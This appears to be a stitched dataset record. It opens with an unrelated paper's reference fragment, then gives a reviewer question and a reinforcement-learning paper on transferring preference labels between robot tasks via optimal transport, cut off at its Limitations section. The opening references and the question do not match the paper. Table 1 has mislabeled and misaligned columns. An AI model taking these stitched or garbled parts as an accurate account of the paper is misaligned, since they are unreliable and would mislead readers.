Elizabeth C Tyler-Kabara, Aaron P Batista, Steven M Chase, and Byron M Yu. Learning by neural reassociation. *Nature neuroscience*, 21(4):607–616, 2018. Timothée Masquelier, R. Guyonneau, and Simon J. Thorpe. Competitive stdp-based spike pattern learning. *Neural Computation*, 21(5):1259–1276, 2009. Nicolas Y Masse, Gregory D Grant, and David J Freedman. Alleviating catastrophic forgetting using context-dependent gating and synaptic stabilization. *Proceedings of the National Academy of Sciences*, 115(44):E10467–E10475, 2018. Earl K Miller, Jonathan D Cohen, et al. An integrative theory of prefrontal cortex function. *Annual review of neuroscience*, 24(1):167–202, 2001. H. Mostafa. Supervised Learning Based on Temporal Coding in Spiking Neural Networks. *IEEE Transactions on Neural Networks and Learning Systems*, 29(7):3227–3235, July 2018. ISSN 2162-237X. doi: 10.1109/TNNLS.2017.2726060. Milad Mozafari, Mohammad Ganjtabesh, Abbas Nowzari-Dalini, Simon J Thorpe, and Timothée Masquelier. Bio-inspired digit recognition using reward-modulated spike-timing-dependent plasticity in deep convolutional networks. *Pattern recognition*, 94:87–95, 2019. Erkki Oja. Simplified neuron model as a principal component analyzer. *Journal of mathematical biology*, 15(3):267–273, 1982. Nicolas Skatchkovsky, Hyeryung Jang, and Osvaldo Simeone. Bayesian continual learning via spiking neural networks. *arXiv preprint arXiv:2208.13723*, 2022. Yujie Wu, Lei Deng, Guoqi Li, Jun Zhu, and Luping Shi. Spatio-temporal backpropagation for training high-performance spiking neural networks. *Frontiers in neuroscience*, 12:331, 2018.
PbpJnyewVM
It seems that the total number of trajectories is 4, and the authors use a K-means clustering to separate them further. I am wondering about the necessity of doing this. Are you labeling the preference among clusters or within clusters?
ZERO-SHOT CROSS-TASK PREFERENCE ALIGNMENT FOR OFFLINE RL VIA OPTIMAL TRANSPORT Anonymous authors Paper under double-blind review ABSTRACT In preference-based Reinforcement Learning (PbRL), aligning rewards with human intentions often necessitates a substantial volume of human-provided labels. Furthermore, the expensive preference data from prior tasks often lacks reusability for subsequent tasks, resulting in repetitive labeling for each new task. In this paper, we propose a novel zero-shot cross-task preference-based RL algorithm that leverages labeled preference data from source tasks to infer labels for target tasks, eliminating the requirement for human queries. Our approach utilizes Gromov-Wasserstein distance to align trajectory distributions between source and target tasks. The solved optimal transport matrix serves as a correspondence between trajectories of two tasks, making it possible to identify corresponding trajectory pairs between tasks and transfer the preference labels. However, direct learning from these inferred labels might introduce noisy or inaccurate reward functions. To this end, we introduce Robust Preference Transformer, which considers both reward mean and uncertainty by modeling rewards as Gaussian distributions. Through extensive empirical validation on robotic manipulation tasks from Meta-World and Robomimic, our approach exhibits strong capabilities of transferring preferences between tasks in a zero-shot way and learns reward functions from noisy labels robustly. Notably, our approach significantly surpasses existing methods in limited-data scenarios. The videos of our method are available on the website: https://sites.google.com/view/pot-rpt. 1 INTRODUCTION Recent years have witnessed remarkable achievements in Reinforcement Learning (RL), particularly in addressing sequential decision-making problems given a well-defined reward function (Mnih et al., 2013; Silver et al., 2016; Vinyals et al., 2019; Berner et al., 2019). Nevertheless, the practical application of RL algorithms is often impeded by the considerable effort and time required for reward engineering, along with the unexpected and potentially unsafe outcomes of reward hacking, where RL agents exploit reward functions in unanticipated ways. Furthermore, infusing RL learners with societal norms or human values via crafted reward functions remains a great challenge in certain practical deployment. As a promising alternative, preference-based RL (Christiano et al., 2017) introduces a paradigm shift from traditional RL by learning reward functions based on human preferences between trajectories rather than manually designed reward functions. By directly capturing human intentions, preference-based RL has demonstrated an ability to teach agents novel behaviors that align more closely with human values. However, while the strides made in preference-based RL are significant (Park et al., 2022; Liang et al., 2022; Liu et al., 2022), current algorithms come with their own set of challenges. First, they are heavily reliant on a vast number of online queries to human experts for preference labels for reward and policy learning. This dependency not only increases the time and cost associated with training but also results in data that cannot be recycled or repurposed for new tasks. Each new task encountered demands its own set of human preference labels, creating a cycle of labeling that is both resource-intensive and inefficient. While Hejna III & Sadigh (2023) leverages prior data to pre-train reward functions via meta-learning and adapts quickly with new task preference data, the need for millions of pre-collected preference labels and further online queries makes this approach impractical in many scenarios. Recently, Gromov-Wasserstein (GW) distance (Mémoli, 2011) has shown effectiveness in a variety of structured data matching problems, such as graphs (Xu et al., 2019) and point clouds (Peyré et al., 2016). Gromov-Wasserstein distance measures the relational distance and finds the optimal transport... plan across different domains. Inspired by this, we consider using Gromov-Wasserstein distance as an alignment tool between the trajectories of source and target tasks. Given two sets of trajectories from source and target tasks respectively, we can identify the corresponding trajectory pairs between tasks based on the solved optimal transport matrix. Hence, a zero-shot cross-task preference-based RL algorithm can be developed that utilizes previously annotated preference data to transfer the preference labels across tasks. In this work, we aim to leverage data collected from existing source tasks to reduce the human labeling cost. We propose to use Gromov-Wasserstein distance to find the correspondence between trajectories from source tasks and target tasks and compute preference labels according to trajectory alignment, as shown in Figure 1. Our method only requires a small number of preference labels from source tasks, then obtaining abundant preference labels for the target task. However, the transferred labels may contain a proportion of incorrect labels, which significantly affect reward and policy learning. To learn robustly from POT labels, we introduce a novel distributional reward modeling approach, which not only captures the average reward but also factors in the reward uncertainty. In summary, our contributions are three-fold. First, we introduce Preference Optimal Transport (POT), the first zero-shot cross-task preference-based RL approach that utilizes small amount of preference data from similar tasks to infer pseudo labels via optimal transport. Second, we propose Robust Preference Transformer (RPT) to ensure robust learning from POT labels. Last, we validate the effectiveness of our approach through experiments on several robotic manipulation tasks of Meta-World (Yu et al., 2020) and Robomimic (Mandlekar et al., 2022). The empirical results the strong abilities of our method in zero-shot preference transfer. Moreover, it is shown that our method significantly outperforms current methods when there is a lack of human preference annotations. 2 RELATED WORK Preference-based Reinforcement Learning. Preference-based RL algorithms have achieved great success by aligning with human feedback (Christiano et al., 2017; Ibarz et al., 2018; Lee et al., 2021a; Ouyang et al., 2022; Bai et al., 2022). The main challenge of preference-based RL is feedback efficiency and many recent preference-based RL works have contributed to tackle this problem. To improve feedback efficiency, PEBBLE (Lee et al., 2021b) proposes to use unsupervised exploration for policy pre-training. SURF (Park et al., 2022) infers pseudo labels based on reward confidence to take advantage of unlabeled data, while RUNE (Liang et al., 2022) facilitates exploration guided by reward uncertainty. Meta-Reward-Net (Liu et al., 2022) further improves the efficiency by incorporating the performance of the Q-function during reward learning. However, most current preference-based RL methods still requires a large number of human preference labels for training new tasks, and the data cannot be utilized for learning other tasks. To leverage preference data on source tasks and reducing the amount of human feedback, Hejna III & Sadigh (2023) leverages meta learning to pre-train the reward function, achieving fast adaptation on new tasks with few human preferences. Despite the success of Hejna III & Sadigh (2023) in reducing human cost, it still needs 1.5 million labels for pre-training and further online querying for the new task. Recently there is attention on the offline setting. Preference Transformer (PT) (Kim et al., 2023) proposes to use Transformer architecture to model non-Markovian rewards and outperforms previous methods that model Markovian rewards. IPL (Hejna & Sadigh, 2023) learns policies without reward functions. Nonetheless, PT and IPL still require hundreds of human labels. Our method differs from prior methods that we only need a small number of human labels from source tasks and can obtain extensive preference labels for the new task. **Optimal Transport.** Optimal Transport (OT) has been widely studied in domain adaptation (Damodaran et al., 2018; Shen et al., 2018), graph matching (Titouan et al., 2019; Xu et al., 2019), recommender systems (Li et al., 2022), and imitation learning (Fickinger et al., 2022). For example, GWL (Xu et al., 2019) is proposed to jointly learn node embeddings and perform graph matching. Li et al. (2022) transfers the knowledge from the source domain to the target domain by using Gromov-Wasserstein distance to align the representation distributions. In the context of RL, there are several imitation learning methods that utilize OT to align the agent’s and expert’s state-action distributions (Dadashi et al., 2021; Cohen et al., 2021; Haldar et al., 2023a; Luo et al., 2023; Haldar et al., 2023b). For cross-task imitation learning method, GWIL (Fickinger et al., 2022) aligns agent states between source and target tasks and computes pseudo rewards based on solved optimal transport plan. POT is the first preference-based RL algorithm that leverages optimal transport for cross-task learning. POT does not perform representation space alignment, which requires additional gradient computation. It directly uses Gromov-Wasserstein distance to align trajectory distributions between tasks and compute preference labels for the target tasks according to the transport matrix. **Distributional Modeling for Robust Learning from Noisy Samples.** Traditional representation learning techniques extract features as fixed points. However, such modeling fails to adequately capture data uncertainty, leading to suboptimal performance with noisy data. A series of studies have proposed modeling features as distributions to enhance robustness, seen in person Re-ID (Yu et al., 2019), face recognition (Chang et al., 2020), scene graph generation (Yang et al., 2021), Vision-Language Pre-training (VLP) (Ji et al., 2022). Specifically, these methods utilize Gaussian distributions rather than fixed points to model features, interpreting variance as uncertainty. In preference-based RL, Xue et al. (2023) proposes an encoder-decoder architecture for reward modeling, which encodes state-action features as Gaussian distributions. Consequently, the features can be manipulated in a latent space and they are constrained to be close to a prior distribution to stabilize reward learning process. In our work, we model reward distributions rather than feature distributions and we are the first to model reward distribution in preference-based RL to the best of our knowledge. ### Problem Setting & Preliminaries **Problem Setting.** In this paper, we consider preference transfer between tasks share the same action space. We assume there exists a task distribution \( p(T) \), with each task \( T \) corresponding to a distinct Markov Decision Process (MDP). MDP is defined by the tuple \((S, A, P, R, \gamma)\) consisting of a state space \( S \), an action space \( A \), a transition function \( P : S \times A \rightarrow S \), a reward function \( R : S \times A \rightarrow \mathbb{R} \), and a discount factor \( \gamma \in (0, 1) \). While the action space \( A \) remain identical across these MDPs, the state space \( S \), the transition function \( P \), the reward function \( R \), and the discount factor \( \gamma \) can differ. In this context, our paper introduces the problem of zero-shot preference transfer. We consider a source task \( S \sim p(T) \) and a target task \( T \sim p(T) \), which means that \( S \) and \( T \) have the same action space. Assume we have \( M \) trajectories \( x_i \) of task \( S \), \( i = 1, \cdots, M \), along with preference labels of all combinations of trajectory pairs \((x_i, x_{i'})\) where \( i, i' = 1, \cdots, M, i < i' \). For task \( T \), there are \( N \) trajectories \( y_j \), \( j = 1, \cdots, N \). The goal of our method is to learn a policy \( \pi(a | s) \) for task \( T \) with preference labels transferred from task \( S \). **Preference-based Reinforcement Learning.** Preference-based RL is assumed to have no access to the ground-truth reward function and learns a reward function \( \hat{r}_\psi \) from human preferences. A trajectory segment of length \( H \) is represented as \( x = \{s_1, a_1, \cdots, s_H, a_H\} \). Given a pair of segments \((x^0, x^1)\), a human provides a preference label \( z \in \{0, 1, 0.5\} \), where 0 indicates that \( x^0 \) is preferred over \( x^1 \) (denoted as \( x^0 \succ x^1 \)), 1 denotes the reverse preference, and 0.5 indicates the two segments are equally preferable. The preference predictor formulated via the Bradley-Terry model (Bradley & Terry, 1952) is: \[ P_\psi[x^0 \succ x^1] = \frac{\exp \sum_t \hat{r}_\psi(s^0_t, a^0_t)}{\exp \sum_t \hat{r}_\psi(s^0_t, a^0_t) + \exp \sum_t \hat{r}_\psi(s^1_t, a^1_t)}. \tag{1} \] With a dataset containing trajectory pairs and their labels \( D = \{(x^0, x^1, z)\} \), the parameters of the reward function can be optimized using the following cross-entropy loss: \[ L_{ce}(\psi) = - \mathbb{E}_{(x^0, x^1, z) \sim D} \left[ (1 - z) \log P_\psi[x^0 \succ x^1] + z \log P_\psi[x^1 \succ x^0] \right]. \] By aligning the reward function with human preferences, the policy can be learned from labeled transitions by \( \hat{\tau}_\psi \) via RL algorithms. **Optimal Transport.** Optimal Transport (OT) aims to find the optimal coupling of transporting one distribution into another with minimum cost. Unlike Wasserstein distance, which measures absolute distance, Gromov-Wasserstein distance is a relational distance metric incorporating the metric structures of the underlying spaces (Mémoli, 2011; Peyré et al., 2016). Besides, Gromov-Wasserstein distance measures the distance across different domains, which is beneficial for cross-domain learning. The mathematical definition of Gromov-Wasserstein distance is as follows: **Definition 1.** (Gromov-Wasserstein Distance (Peyré et al., 2016)) Let \((X, d_X, \mu_X)\) and \((Y, d_Y, \mu_Y)\) denote two metric measure spaces, where \(d_X\) and \(d_Y\) represent distance metrics measuring similarity within each task, and \(\mu_X\) and \(\mu_Y\) are Borel probability measures on \(X\) and \(Y\), respectively. For \(p \in [1, \infty]\), the \(p\)-Gromov-Wasserstein distance is defined as: \[ GW(\mu_X, \mu_Y) = \left( \inf_{\gamma \in \Pi(\mu_X, \mu_Y)} \int_{X \times Y} L(x, x', y, y')^p d\gamma(x, y) d\gamma(x', y') \right)^{\frac{1}{p}}, \] where \(L(x, x', y, y') = |d_X(x, x') - d_Y(y, y')|\) denotes the relational distance function, and \(\Pi(\mu_X, \mu_Y)\) is the set of joint probability distributions with marginal distributions \(\mu_X\) and \(\mu_Y\). ### 4 Method In this section, we present Preference Optimal Transport (POT), a zero-shot offline preference-based RL algorithm that transfers preferences between tasks via optimal transport. First, we propose to align the trajectories of source and target tasks using optimal transport and computes preference labels according to the solved optimal alignment matrix. Second, we introduce Robust Preference Transformer (RPT), which additionally incorporates the reward uncertainty by modeling the rewards from a distributional perspective, enabling robust learning from noisy labels. #### 4.1 Preference Optimal Transport Gromov-Wasserstein distance shows great abilities in aligning structural information, such as correspondence of edges between two graphs. Therefore, we consider using Gromov-Wasserstein distance as an alignment metric between the trajectories of source and target tasks, finding the alignment of paired trajectories between tasks, and inferring preference labels based on the correspondence and preference labels of the source trajectory pairs. POT aims to identify the correspondence between two sets of trajectories and transfer the preferences based on accordingly. In this paper, we consider preference transfer problem from a source task \(S\) to a target task \(T\), with their distributions denoted as \(\mu\) and \(\nu\), respectively. Assume we have \(M\) segments with pairwise preference labels \(\{x_i\}_{i=1}^{M}\) from the source task and \(N\) segments \(\{y_j\}_{j=1}^{N}\) from the target task. The trajectories can be represented by the probability measures \(\mu = \sum_{i=1}^{M} u_i \delta_{x_i}\) and \(\nu = \sum_{j=1}^{N} v_j \delta_{y_j}\), where \(\delta_x\) denotes the Dirac function centered on \(x\). The weight vectors \(\{u_i\}_{i=1}^{M}\) and \(\{v_j\}_{j=1}^{N}\) satisfy \(\sum_{i=1}^{M} u_i = 1\) and \(\sum_{j=1}^{N} v_j = 1\), respectively. The empirical Gromov-Wasserstein distance for aligning trajectories between source and target tasks is expressed as: \[ GW^2(\mu, \nu) = \min_{T \in \Pi(\mu, \nu)} \sum_{i=1}^{M} \sum_{i'=1}^{M} \sum_{j=1}^{N} \sum_{j'=1}^{N} |d_s(x_i, x_{i'}) - d_t(y_j, y_{j'})|^2 T_{ij} T_{i'j'}, \] where the optimal transport matrix is \(T = [T_{ij}]\), \(\Pi(\mu, \nu)\) denotes the set of all couplings between \(\mu\) and \(\nu\), \(\Pi(\mu, \nu) = \{T \in \mathbb{R}^{M \times N} \mid T1_N = \mu, T^\top 1_M = \nu\}\), \(1_M\) denotes a \(M\)-dimensional vector with all elements equal to one, and \(d_s, d_t\) represent the distance function in each task, such as Euclidean function or Cosine function. Upon solving Equation 4, we obtain the optimal transport matrix \(T\) representing the correspondence between the trajectories of the two tasks. Each element, \(T_{ij}\), indicates the probability that trajectory Figure 2: Different types of reward modeling. (a) Scalar reward modeling, which only considers scalar rewards. This modeling type is widely used in preference-based RL algorithms (Christiano et al., 2017; Lee et al., 2021b; Kim et al., 2023). (b) Distributional reward modeling, which adds a branch for modeling reward uncertainty in addition to reward mean. $x_i$ matches trajectory $y_j$, and the $j$-th column represents the correspondence between $y_j$ and all source trajectories. Therefore, for a pair of trajectories $(y_j, y'_j)$, we can identify the paired relations based on the optimal transport matrix. We define the trajectory pair matching matrix $A^{jj'}$ for each $(y_j, y'_j)$ by multiplying the $j$-th column $T_{ij}$ and the transpose of $j'$-th column $T_{ij'}^\top$: $$A^{jj'} = T_{ij} T_{ij'}^\top,$$ where $A^{jj'} \in \mathbb{R}^{N \times N}$, and each element $A^{jj'}_{ii'}$ of the matrix represents the correspondence of trajectory pair $(y_j, y'_j)$ with trajectory pair $(x_i, x'_i)$ from the source task. If we denote the preference label of $(x_i, x'_i)$ as $z(x_i, x'_i)$, then the POT label of $(y_i, y_{i'})$ is computed as follows: $$z(y_j, y_{j'}) = \sum_i \sum_{i' \neq i} A^{jj'}_{ii'} z(x_i, x_{i'}),$$ where $i' \neq i$ because the same segments are equally preferable. In Equation 6, the preference labels of source task trajectory pairs are weighted by the trajectory pair correspondence. This means that the preference labels of matched trajectory pairs contribute more to the preference transfer. The full procedures for computing POT labels are shown in Algorithm 1 in Appendix A. 4.2 Robust Preference Transformer Obtaining preferences labels transferred according to the optimal transport matrix, we can utilize preference-based RL approaches, such as the offline preference-based RL algorithm PT (Kim et al., 2023), to learn reward functions. However, the labels may include some noise and learning from such data using previous methods will influence the accuracy of the rewards and eventually the performance of the policy. Prior preference-based RL methods represent the rewards as fixed scalar values (Christiano et al., 2017; Lee et al., 2021b; Kim et al., 2023). However, this type of reward modeling is vulnerable to noisy labels. Given a preference dataset comprising trajectory pairs and their preference labels, altering one preference label $z$ of a pair $(x_0, x_1)$ into $1 - z$ will dramatically shift the optimization direction of the reward function on the pair. Thus, if we respectively learn two reward models from the clean dataset and the data with an inverse label, the two reward models will predict distinct values for that trajectory pair. Subsequent, the inaccurate rewards will affect the performance of the policy. Therefore, a robust preference-based RL algorithm capable of learning from noisy labels is necessary. **Distributional Reward Modeling.** To improve the robustness of preference-based RL in the presence of noisy labels, we incorporate reward uncertainty and model the rewards from a distributional perspective. Specifically, the rewards are modeled as Gaussian distributions, where the mean represents the estimated reward and the variance signifies the reward uncertainty. As shown in Figure 2, we design two branches for modeling reward mean and variance concurrently. Given the extracted embedding of a trajectory segment represented as \( \{x_t\} \), we split \( \{x_t\} \) into two tensors of the same shape along the embedding dimension. These split tensors are separately processed by the mean and variance branches, ultimately yielding reward mean \( \{\hat{r}_t\} \) and variance \( \{\sigma^2_t\} \). With reward mean and variance, we then construct the preference predictor \( P_\psi \) and derive the loss function for distributional reward learning based on Equation 2: \[ L_{ce} = \mathbb{E}_{(x^0, x^1, z) \sim D} \left[ CE(P_\psi(\{\hat{r}^0_t\}, \{\hat{r}^1_t\}), z) + \lambda \cdot \mathbb{E}_{\beta^0_t \sim p(\beta^0_t), \beta^1_t \sim p(\beta^1_t)} CE(P_\psi(\{\beta^0_t\}, \{\beta^1_t\}), z) \right], \] where \( \lambda \) balances the reward mean \( \{\hat{r}_t\} \) and the stochastic term \( \{\beta_t\} \), \( \{\hat{r}^0_t\} \) and \( \{\beta^0_t\} \) respectively denote the reward mean and reward samples of trajectory segment \( x^0 \) (and \( \{\hat{r}^1_t\} \) and \( \{\beta^1_t\} \) for \( x^1 \)), preference predictor \( P_\psi \) in the first term takes the reward mean of two segments as inputs while the second \( P_\psi \) uses sampled rewards of two segments as inputs, and \( CE \) denotes the cross-entropy loss. In practical, the second expectation in Equation 7 is approximated by the mean of \( K \) samples from the distribution of \( \beta \). **Regularization Loss.** The sampled rewards with large variance will make the second term of Equation 7 a large value. If we directly optimize Equation 7, the variance of all samples will decrease, and eventually close to zero. Therefore, to avoid the variance collapse, we introduce a regularization loss to force the uncertainty level to maintain a level \( \eta \): \[ L_{reg} = \max(0, \eta - h(N(\hat{r}, \sigma^2))), \] where \( h(N(\hat{r}, \sigma^2)) = \frac{1}{2} \log(2\pi e \sigma^2) \) computes the entropy of the Gaussian distribution. Combing the cross-entropy loss in Equation 7 and regularization loss in Equation 8, the total loss for RPT training is as follows: \[ L(\psi) = L_{ce} + \alpha \cdot L_{reg}, \] where \( \alpha \) is a trade-off factor between the two terms. **Reparameterization Trick.** Directly sampling \( \beta \) from \( N(\hat{r}, \sigma^2) \) will prevent the back propagation process. Hence, we use the reparameterization trick to first sample a noise \( \epsilon \) from standard Gaussian distribution \( N(0, 1) \), and computes the sample by: \[ \beta = \hat{r} + \sigma \cdot \epsilon. \] Therefore, the reward mean and variance can be learned without the influences of sampling operation. ### 4.3 Practical Algorithm The entire algorithm mainly comprises three stages. First, our approach computes POT labels based on Gromov-Wasserstein distance alignment and the procedures are shown in Algorithm 1 in Appendix A. In Algorithm 1, we use Sinkhorn algorithm (Peyré et al., 2016) to solve the optimal transport matrix, which is implemented by Python Optimal Transport (Flamary et al., 2021). Second, the RPT is trained by POT labels obtained from the first step. Last, we relabel the transitions in the offline dataset using the trained reward function and train offline RL algorithms, such as Implicit Q-Learning (IQL) (Kostrikov et al., 2022). The full procedures are shown in Algorithm 2 in Appendix A. ### 5 Experiments In this section, we first conduct experiments to evaluate our proposed method on several pairs of robotic manipulation tasks from Meta-World (Yu et al., 2020) and Robomimic (Mandlekar et al., 2022) in zero-shot setting. Then we demonstrate our approach significantly surpasses existing methods in limited-data scenarios. Last, we evaluate our algorithm with different choice of cost functions and noise levels. #### 5.1 Compared Methods and Training Details The following methods are included for experimental evaluation: - **PT** (Kim et al., 2023): The original PT algorithm trained from the preference labels computed by the ground-truth rewards. - **PT+Semi**: This baseline combines PT with semi-supervised learning, which is proposed in the online feedback-efficient preference-based RL algorithm SURF (Park et al., 2022). The method infers pseudo preference labels of unlabeled data based on the reward confidence. • IPL (Hejna & Sadigh, 2023): An offline preference-based RL algorithm that learns policies without modeling reward functions. • PT+Dis: The baseline is a cross-task preference-based RL algorithm that calculates transferred preference labels simply based on the trajectory similarity between tasks. • PT+POT (Ours): The method is a zero-shot preference-based RL algorithm that learns PT from preference labels transferred by POT. • RPT+POT (Ours): The method robustly learns RPT from POT labels by modeling reward distribution. • IPL+POT (Ours): The method learns from POT labels without reward functions. **Implementation Details.** All methods are implemented based on the officially released code of PT \(^1\) and IPL \(^2\). RPT is implemented by replacing the preference attention layer of PT with two branches, each comprising a two-layer Multi-layer Perceptrons (MLP), with the other settings identical to PT. Both PT and PT+Semi utilize scripted labels computed according to ground-truth rewards, which is a common way for the evaluation of preference-based RL algorithms (Lee et al., 2021b; Liu et al., 2022; Kim et al., 2023). PT+POT, RPT+POT and IPL+POT are trained with computed POT labels (zero-shot) or a mixture of POT labels and scripted labels (few-shot). All PT-based methods initially train reward models using the preference data, and the offline RL algorithm IQL (Kostrikov et al., 2022) is used for policy learning following PT. For IPL-based method, policies are directly learned from preferences. For the Meta-World benchmark, Button Press and Faucet Close serve as source tasks, while Window Open, Door Close, Drawer Open, and Sweep Into are evaluated as target tasks. For Robomimic, we set Square-mh as the source task, and Can-mh and Lift-mh as target tasks. The used tasks and datasets are detailed in Appendix C. We set the segment length as 50 for Meta-World tasks and 100 for Robomimic tasks. For the number of target task preference labels, we provide 100 for Window Open and Door Close, 500 for Drawer Open, Can-mh and Lift-mh, and 1000 for Sweep Into. The Euclidean function is employed as the cost function in the Gromov-Wasserstein distance alignment, with different cost functions discussed in Section 5.4. Regarding RPT learning, the margin \(\eta\) in Equation 8 is set to 100 for all experiments, with different margin effects evaluated in Appendix D. The number of samples \(K\) in Equation 7 is consistently set to 5. The weight \(\lambda\) in Equation 7 is 0.3 for Door Close with Button Press as the source task, and 0.1 for the other task pairs. The trade-off \(\alpha\) in Equation 9 is set to 0.02 for Drawer Open with Button Press as the source task, and 0.01 for all other experiments. Detailed network architectures and hyperparameters of all methods and IQL are presented in Appendix C. The tasks of Meta-World and Robomimic are evaluated through success rate. Each task is conducted with five random seeds, with the mean and standard deviation of success rates reported. Each run evaluates the policy by rolling out 50 episodes at every evaluation step, calculating performance as the mean success rate over these 50 episodes. All experiments are run on NVIDIA GeForce RTX 3080 and NVIDIA Tesla V100 GPUs with 8 CPU cores. ### 5.2 Results of Zero-shot Preference Learning Table 1 shows the results on robotic manipulation tasks of Meta-World and Robomimic with different pairs of source and target tasks \(^3\). For the baselines that use scripted preference labels, PT, PT+Semi and IPL yield outstanding performance on the majority of tasks, where PT achieves a mean success rate of 91.7% on Meta-World Tasks and 83.8% across all tasks. The performance of PT+Semi is almost the same with that of PT on Meta-World tasks, but has a drop on Robomimic tasks. For IPL, it outperforms PT and PT+Semi on Robomimic, while its performance on Meta-World is worse than that of them. By transferring preference via OT, POT attains a mean accuracy of 74.9% in computing preference labels across all tasks. PT trained with POT labels realizes a 71.2% success rate, equating to 85.0% of oracle performance (i.e., the performance of PT trained with scripted labels). RPT, --- 1<https://github.com/csmile-1006/PreferenceTransformer> 2<https://github.com/hejna/inverse-preference-learning> 3PT, PT+Semi and IPL do not require preference data from source tasks, so their results are solely depend on the target tasks. 4PT+Sim cannot work by transferring preferences from Square-mh to Lift-mh because the state dimension of these two tasks are different. Table 1: Success rate of our method against the baselines on robotic manipulations tasks of Meta-World and Robomimic benchmark. The results are reported with mean and standard deviation across five random seeds. | Source Task | Target Task | PhRL with Scripted Labels | PhRL with Transferred Labels | POT Acc. | |-------------|-------------|---------------------------|-----------------------------|----------| | | | PT | PT+Sim | IPL | PT+Sim | PT+POT | RPT+POT | IPL+POT | | | Button Press | Window Open | 89.2 ±5.4 | 86.4 ±3.0 | 91.6 ±6.2 | 44.0 ±26.3 | 85.6 ±17.1 | 88.0 ±11.6 | 91.2 ±5.9 | 87.0 | | Button Press | Door Close | 94.8 ±4.8 | 94.8 ±7.6 | 75.6 ±32.6 | 63.6 ±24.5 | 59.6 ±48.1 | 78.4 ±29.5 | 46.8 ±30.7 | 78.0 | | Button Press | Drawer Open | 96.6 ±6.1 | 96.8 ±3.3 | 91.2 ±4.1 | 18.0 ±33.0 | 80.8 ±21.0 | 84.0 ±16.0 | 76.8 ±10.4 | 76.6 | | Button Press | Sweep Into | 86.0 ±8.7 | 88.4 ±5.2 | 73.2 ±6.4 | 48.8 ±34.9 | 77.2 ±11.0 | 80.0 ±6.8 | 76.8 ±7.6 | 69.5 | | Faucet Close | Window Open | 89.2 ±5.1 | 86.4 ±3.0 | 91.6 ±6.2 | 21.2 ±17.2 | 84.8 ±10.9 | 88.8 ±6.7 | 88.4 ±11.5 | 87.0 | | Faucet Close | Door Close | 94.8 ±4.8 | 94.8 ±7.6 | 75.6 ±32.6 | 38.8 ±44.8 | 72.8 ±40.9 | 86.4 ±8.2 | 41.6 ±31.5 | 72.0 | | Faucet Close | Drawer Open | 96.6 ±6.1 | 96.8 ±3.3 | 91.2 ±4.1 | 56.4 ±23.4 | 70.2 ±38.8 | 90.8 ±12.0 | 70.4 ±11.6 | 71.0 | | Faucet Close | Sweep Into | 86.0 ±8.7 | 88.4 ±5.2 | 73.2 ±6.4 | 14.0 ±20.0 | 71.6 ±17.4 | 75.2 ±6.6 | 81.6 ±7.1 | 68.4 | | Square-mh | Can-mh | 35.6 ±11.6 | 30.8 ±12.7 | 50.8 ±12.2 | – | 32.8 ±5.9 | 34.8 ±12.1 | 45.6 ±8.2 | 70.0 | | Square-mh | Lift-mh | 68.8 ±19.2 | 60.8 ±7.3 | 92.4 ±3.3 | – | 62.0 ±19.1 | 74.4 ±23.1 | 81.6 ±6.1 | 63.2 | | Average (without Robomimic) | | 91.7 | 91.6 | 82.9 | 38.1 | – | 76.5 | 84.0 | 71.7 | 76.9 | | Average (all settings) | | 83.8 | 82.4 | 80.6 | – | 71.2 | 78.1 | 70.1 | 74.9 | incorporating reward uncertainty in reward modeling, enhances performance to 78.1% across all tasks when trained with POT labels, equivalent to 93.2% oracle performance. Also, IPL+POT achieves 70.1% success rate across all tasks, which is equal to 87.0% oracle performance. We can conclude that RPT+POT can achieve competitive performance compared with baselines trained with scripted preference labels. Both PT+POT and RPT+POT outperforms PT+Sim by a large margin, and RPT+POT even exceeds PT on the Lift-mh task, demonstrating the powerful capabilities of POT and RPT in zero-shot preference transfer and robust learning. 5.3 Results of Few-shot Preference Learning The results in Table 1 have shown strong zero-shot transfer ability of POT. To further balance the human labeling cost and algorithm performance, we are interested in how well does RPT+POT perform when there are a small number of preference labels. For fair comparison, we evaluate our method and PT with the same number of scripted preference labels of the target task, across $F_{\text{oracle}} \in \{0, 5, 10, 15, 20\}$. Our method additionally obtains $F_{\text{POT}} = 100 - F_{\text{oracle}}$ POT labels by transferring from the source task. The results in Figure 3 show that RPT+POT significantly outperforms PT when lacking oracle preference labeling, and the advantage becomes more obvious when the number of labels is smaller. Moreover, RPT+POT even exceeds the Oracle PT (i.e., PT with 100 scripted labels) on Window Open task when $F_{\text{oracle}} \in \{5, 10, 15, 20\}$. The results demonstrate the excellent performance of our method when oracle labels are hard to obtain, and POT can be used to significantly reduce extensive human labeling. ![Figure 3](image-url) Figure 3: Success rate of Door Close and Window Open with different scripted preference labels. 5.4 Ablation Study Different Cost Functions. The sensitivity of POT to the cost function is examined by evaluating PT+POT and RPT+POT performance with varying cost functions, including the Euclidean and Cosine functions. Table 2 demonstrates that POT performs robustly with either cost function. Notably, POT Table 2: Success rates on three pairs of source and target tasks with different cost functions. The results are reported with mean and standard deviation of success rate across five runs. | Source Task | Target Task | Euclidean | Cosine | |-----------------|--------------|-----------|--------| | | | RPT+POT | POT Acc.| RPT+POT | POT Acc. | | Button Press | Sweep Into | 80.0 ±6.8 | 69.5 | 79.2 ±5.4 | 65.0 | | Faucet Close | Window Open | 88.8 ±6.7 | 87.0 | 92.4 ±3.6 | 91.0 | | Square-mh | Lift-mh | 74.4 ±23.1| 63.2 | 69.3 ±9.5 | 66.0 | | **Average** | | 81.1 | 73.2 | 80.3 | 74.0 | with the Cosine function even attains 91.0% accuracy in computing POT labels on the Window Open task, with its success rate (92.4%) surpassing PT with scripted labels on this task (89.2%). **Different Noise Levels.** To evaluate the performance of PT and RPT under different noise levels, we conduct experiments with 10%, 20%, 30% noisy labels induced by flipping scripted labels. The results in Figure 4 reveal the enhanced robustness of RPT to label noise, with RPT significantly outperforming PT at higher noise levels. ![Figure 4: Success rate of Sweep Into and Window Open under different noise levels.](image) ### 6 CONCLUSION In this paper, we present POT, a novel cross-task preference-based RL algorithm, which leverages Gromov-Wasserstein distance for aligning trajectory distributions across different tasks and transfers preference labels through optimal transport matrix. POT only needs small amount of preference data from prior tasks, eliminating the need for a substantial amount pre-collected preference data or extensive human queries. Furthermore, we propose Robust Preference Transformer, which models reward uncertainty rather than scalar rewards to robustly learn from POT labels. Empirical results on various robotic manipulation tasks of Meta-World and Robomimic demonstrate the effectiveness of our method in zero-shot transferring accurate preference labels and improves the robustness of learning from noisy labels. Additionally, our method significantly surpasses the current method when there are a few preference labels. By minimizing human labeling costs to a great extent, POT paves the way for the practical applications of preference-based RL algorithms. **Limitations** Our method does present certain limitations. Firstly, our method is not well-suited for high-dimensional 